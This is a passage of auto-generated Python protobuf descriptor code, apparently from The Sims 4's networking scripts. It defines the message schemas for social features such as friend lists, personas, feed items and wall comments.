\x03(\t\x12\x0e\n\x06digest\x18\x03 \x01(\x0c"t\n\x15SocialCGDigestMessage\x12\x11\n\tchallenge\x18\x01 \x01(\t\x12H\n\ncandidates\x18\x02 
\x03(\x0b24.EA.Sims4.Network.SocialCandidateStatisticSubmessage*\x01\n\x12SocialFeedItemType\x12\x17\n\x13SFI_ITEM_DOWNLOADED\x10\x00\x12\x15\n\x11SFI_ITEM_UPLOADED\x10\x01\x12\x16\n\x12SFI_ITEM_FAVORITED\x10\x02\x12\x16\n\x12SFI_ITEM_COMMENTED\x10\x03\x12\x16\n\x12SFI_ITEM_SHOWCASED\x10\x04\x12\x19\n\x15SFI_PROFILE_COMMENTED\x10\x05\x12\x15\n\x11SFI_NEW_FOLLOWERS\x10\x06*\x86\x02\n\x18SocialClusterMessageType\x12\r\n\tSOC_LOGIN\x10\x00\x12\x0e\n\nSOC_LOGOFF\x10\x01\x12\x16\n\x12SOC_PRESENCEUPDATE\x10\x02\x12\x12\n\x0eSOC_FEEDUPDATE\x10\x03\x12\x13\n\x0fSOC_ADD_FEEDSUB\x10\x04\x12\x16\n\x12SOC_REMOVE_FEEDSUB\x10\x05\x12\x18\n\x14SOC_BROADCAST_PRIVOP\x10\x06\x12\x18\n\x14SOC_BROADCAST_QUEUED\x10\x08\x12"\n\x1eSOC_BROADCAST_CACHE_INVALIDATE\x10\t\x12\x1a\n\x16SOC_REST_USER_REGISTER\x10\n')
_SOCIALFEEDITEMTYPE = descriptor.EnumDescriptor(name='SocialFeedItemType',
full_name='EA.Sims4.Network.SocialFeedItemType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SFI_ITEM_DOWNLOADED',
index=0,
number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_UPLOADED',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_FAVORITED',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_COMMENTED',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_ITEM_SHOWCASED',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_PROFILE_COMMENTED',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SFI_NEW_FOLLOWERS',
index=6,
number=6,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6663,
serialized_end=6853)
_SOCIALCLUSTERMESSAGETYPE = descriptor.EnumDescriptor(name='SocialClusterMessageType',
full_name='EA.Sims4.Network.SocialClusterMessageType',
filename=None,
file=DESCRIPTOR,
values=[
descriptor.EnumValueDescriptor(name='SOC_LOGIN',
index=0,
number=0,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_LOGOFF',
index=1,
number=1,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_PRESENCEUPDATE',
index=2,
number=2,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_FEEDUPDATE',
index=3,
number=3,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_ADD_FEEDSUB',
index=4,
number=4,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REMOVE_FEEDSUB',
index=5,
number=5,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_PRIVOP',
index=6,
number=6,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_QUEUED',
index=7,
number=8,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_BROADCAST_CACHE_INVALIDATE',
index=8,
number=9,
options=None,
type=None),
descriptor.EnumValueDescriptor(name='SOC_REST_USER_REGISTER',
index=9,
number=10,
options=None,
type=None)],
containing_type=None,
options=None,
serialized_start=6856,
serialized_end=7118)
SFI_ITEM_DOWNLOADED = 0
SFI_ITEM_UPLOADED = 1
SFI_ITEM_FAVORITED = 2
SFI_ITEM_COMMENTED = 3
SFI_ITEM_SHOWCASED = 4
SFI_PROFILE_COMMENTED = 5
SFI_NEW_FOLLOWERS = 6
SOC_LOGIN = 0
SOC_LOGOFF = 1
SOC_PRESENCEUPDATE = 2
SOC_FEEDUPDATE = 3
SOC_ADD_FEEDSUB = 4
SOC_REMOVE_FEEDSUB = 5
SOC_BROADCAST_PRIVOP = 6
SOC_BROADCAST_QUEUED = 8
SOC_BROADCAST_CACHE_INVALIDATE = 9
SOC_REST_USER_REGISTER = 10
_SOCIALFRIENDMSG = descriptor.Descriptor(name='SocialFriendMsg',
full_name='EA.Sims4.Network.SocialFriendMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='simId',
full_name='EA.Sims4.Network.SocialFriendMsg.simId',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFriendMsg.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='note',
full_name='EA.Sims4.Network.SocialFriendMsg.note',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialFriendMsg.prefix',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFriendMsg.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='cheatForce',
full_name='EA.Sims4.Network.SocialFriendMsg.cheatForce',
index=5,
number=6,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=112,
serialized_end=230)
_SOCIALPERSONARESPONSEMSG = descriptor.Descriptor(name='SocialPersonaResponseMsg',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='personas',
full_name='EA.Sims4.Network.SocialPersonaResponseMsg.personas',
index=0,
number=1,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=232,
serialized_end=276)
_SOCIALGENERICRESPONSE = descriptor.Descriptor(name='SocialGenericResponse',
full_name='EA.Sims4.Network.SocialGenericResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='error',
full_name='EA.Sims4.Network.SocialGenericResponse.error',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='msg_type',
full_name='EA.Sims4.Network.SocialGenericResponse.msg_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postId',
full_name='EA.Sims4.Network.SocialGenericResponse.postId',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='postParentId',
full_name='EA.Sims4.Network.SocialGenericResponse.postParentId',
index=3,
number=4,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=278,
serialized_end=405)
_SOCIALPLAYERINFOLIST_PLAYERINFO = descriptor.Descriptor(name='PlayerInfo',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='AccountName',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountName',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='AccountNotes',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.AccountNotes',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='presence',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.presence',
index=2,
number=3,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='OnlineStatus2',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.OnlineStatus2',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='NucleusId',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.NucleusId',
index=4,
number=9,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='PlayerBio',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.PlayerBio',
index=5,
number=10,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='exclude_reported',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.exclude_reported',
index=6,
number=11,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='IsUserBlocked',
full_name='EA.Sims4.Network.SocialPlayerInfoList.PlayerInfo.IsUserBlocked',
index=7,
number=12,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=501,
serialized_end=724)
_SOCIALPLAYERINFOLIST = descriptor.Descriptor(name='SocialPlayerInfoList',
full_name='EA.Sims4.Network.SocialPlayerInfoList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='players',
full_name='EA.Sims4.Network.SocialPlayerInfoList.players',
index=0,
number=1,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[
_SOCIALPLAYERINFOLIST_PLAYERINFO],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=408,
serialized_end=724)
_SOCIALSEARCHMSG = descriptor.Descriptor(name='SocialSearchMsg',
full_name='EA.Sims4.Network.SocialSearchMsg',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='prefix',
full_name='EA.Sims4.Network.SocialSearchMsg.prefix',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='search_results',
full_name='EA.Sims4.Network.SocialSearchMsg.search_results',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=726,
serialized_end=823)
_ORIGINERRORMESSAGE = descriptor.Descriptor(name='OriginErrorMessage',
full_name='EA.Sims4.Network.OriginErrorMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='errorcode',
full_name='EA.Sims4.Network.OriginErrorMessage.errorcode',
index=0,
number=1,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='errormessage',
full_name='EA.Sims4.Network.OriginErrorMessage.errormessage',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=825,
serialized_end=886)
_SOCIALINVITERESPONSEMESSAGE = descriptor.Descriptor(name='SocialInviteResponseMessage',
full_name='EA.Sims4.Network.SocialInviteResponseMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='invitationid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationid',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='invitationtype',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.invitationtype',
index=1,
number=2,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='inviternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.inviternucleusid',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='accepternucleusid',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.accepternucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='actionSuccess',
full_name='EA.Sims4.Network.SocialInviteResponseMessage.actionSuccess',
index=4,
number=5,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=889,
serialized_end=1040)
_SOCIALCASSANDRATEST = descriptor.Descriptor(name='SocialCassandraTest',
full_name='EA.Sims4.Network.SocialCassandraTest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='opcode',
full_name='EA.Sims4.Network.SocialCassandraTest.opcode',
index=0,
number=1,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1042,
serialized_end=1116)
_SOCIALFRIENDLISTREQUESTMESSAGE = descriptor.Descriptor(name='SocialFriendListRequestMessage',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='account_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.account_id',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='friend_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.friend_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='address_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.address_str',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='object_str',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.object_str',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='reply_proxy_id',
full_name='EA.Sims4.Network.SocialFriendListRequestMessage.reply_proxy_id',
index=4,
number=5,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1119,
serialized_end=1255)
_SOCIALREQUESTNUCLEUSIDFROMPERSONA = descriptor.Descriptor(name='SocialRequestNucleusIdFromPersona',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='personaName',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.personaName',
index=1,
number=2,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialRequestNucleusIdFromPersona.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1257,
serialized_end=1352)
_SOCIALNUCLEUSIDFROMPERSONARESPONSE = descriptor.Descriptor(name='SocialNucleusIdFromPersonaResponse',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='requestid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.requestid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.nucleusid',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message_id',
full_name='EA.Sims4.Network.SocialNucleusIdFromPersonaResponse.message_id',
index=2,
number=3,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1354,
serialized_end=1448)
_SOCIALEXCHANGEMESSAGE = descriptor.Descriptor(name='SocialExchangeMessage',
full_name='EA.Sims4.Network.SocialExchangeMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='envelope',
full_name='EA.Sims4.Network.SocialExchangeMessage.envelope',
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1450,
serialized_end=1533)
_SOCIALFOLLOWERSMESSAGE = descriptor.Descriptor(name='SocialFollowersMessage',
full_name='EA.Sims4.Network.SocialFollowersMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='sfim_blob',
full_name='EA.Sims4.Network.SocialFollowersMessage.sfim_blob',
index=0,
number=1,
type=12,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1535,
serialized_end=1578)
_SOCIALFEEDITEMMESSAGE = descriptor.Descriptor(name='SocialFeedItemMessage',
full_name='EA.Sims4.Network.SocialFeedItemMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='feed_type',
full_name='EA.Sims4.Network.SocialFeedItemMessage.feed_type',
index=1,
number=2,
type=14,
cpp_type=8,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='metadata',
full_name='EA.Sims4.Network.SocialFeedItemMessage.metadata',
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.nucleusid',
index=3,
number=4,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.persona',
index=4,
number=5,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='quantity',
full_name='EA.Sims4.Network.SocialFeedItemMessage.quantity',
index=5,
number=6,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_nucleusid',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_nucleusid',
index=6,
number=7,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='follower_persona',
full_name='EA.Sims4.Network.SocialFeedItemMessage.follower_persona',
index=7,
number=8,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='followers_blob',
full_name='EA.Sims4.Network.SocialFeedItemMessage.followers_blob',
index=8,
number=9,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='is_maxis_curated',
full_name='EA.Sims4.Network.SocialFeedItemMessage.is_maxis_curated',
index=9,
number=10,
type=8,
cpp_type=7,
label=1,
has_default_value=False,
default_value=False,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1581,
serialized_end=1928)
_SOCIALFEEDITEMUNSERIALIZEDMESSAGE = descriptor.Descriptor(name='SocialFeedItemUnserializedMessage',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='feed_id',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.feed_id',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='data',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.data',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='count_override',
full_name='EA.Sims4.Network.SocialFeedItemUnserializedMessage.count_override',
index=2,
number=3,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=1930,
serialized_end=2020)
_SOCIALWALLCOMMENTMESSAGE = descriptor.Descriptor(name='SocialWallCommentMessage',
full_name='EA.Sims4.Network.SocialWallCommentMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='uuid',
full_name='EA.Sims4.Network.SocialWallCommentMessage.uuid',
index=0,
number=1,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_id',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_id',
index=1,
number=2,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='author_persona',
full_name='EA.Sims4.Network.SocialWallCommentMessage.author_persona',
index=2,
number=3,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='message',
full_name='EA.Sims4.Network.SocialWallCommentMessage.message',
index=3,
number=4,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=2022,
serialized_end=2122)
_SOCIALGETWALLCOMMENTSMESSAGE = descriptor.Descriptor(name='SocialGetWallCommentsMessage',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='nucleusid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.nucleusid',
index=0,
number=1,
type=4,
cpp_type=4,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='gallery_id',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.gallery_id',
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='starting_uuid',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.starting_uuid',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='num_results',
full_name='EA.Sims4.Network.SocialGetWallCommentsMessage.num_results',
index=3,
number=4,
type=13,
cpp_type=3,
label=1,
has_default_value=False,
default_value=0,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
